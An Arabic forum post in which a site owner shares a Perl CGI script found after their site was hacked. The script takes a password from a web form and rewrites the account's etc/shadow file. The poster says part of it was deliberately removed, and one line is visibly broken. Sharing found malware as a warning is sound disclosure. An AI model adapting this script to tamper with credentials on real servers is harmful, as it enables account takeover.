لقد تم تهكير على موقعي فوجدت هذا
#!/usr/bin/perl
my ($user,$domain) = split(/\@/, $ENV{'REMOTE_USER'});
my $homedir = (getpwuid($>))[7];
if ($ENV{'QUERY_STRING'} ne "") {
@keys = split(/&/, $ENV{'QUERY_STRING'});
foreach $key (sort @keys) {
($name,$value) = split(/=/, $key);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
} else {
read(STDIN,$q,$ENV{'CONTENT_LENGTH'});
@pairs = split(/\&/, $q);
foreach $pair (sort @pairs) {
($name,$value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
}
$urlbase = $ARGV[0];
if ($urlbase =~ /\@/) {
$urlbase =~ s/\@/+/g;
$urlbase = "/" . $urlbase;
} else {
$urlbase='';
}
open(RANDOM,"/dev/urandom");
read RANDOM,$random,4096;
close(RANDOM);
$random =~ s/\W//g;
if ($pass eq "*") {
$cpass = "*";
} else {
while ($cpass eq undef or $cpass =~ /:/)
{
$cpass = crypt($FORM{'newpass'},$random);
}
}
open(SHADOW,"$homedir/etc/shadow");
@SHADOW=;
close(SHADOW);
open(SHADOW,">$homedir/etc/shadow");
foreach $line (@SHADOW) {
if ($line =~ /^${user}:/) {
my($user,$pass,$extras) = split(/:/, $line, 3);
مسحت اشويه من الشفرة حتى لا تستغل
يريت الكل يشوف ويش هذا
هذا مو الهم الي وين رايح من المستفيد من هذا
وكل يوم انقول يا جماعه ما يصلح الي يصير بس ما فيه فايدة
طابع الشر شغال
الله كريم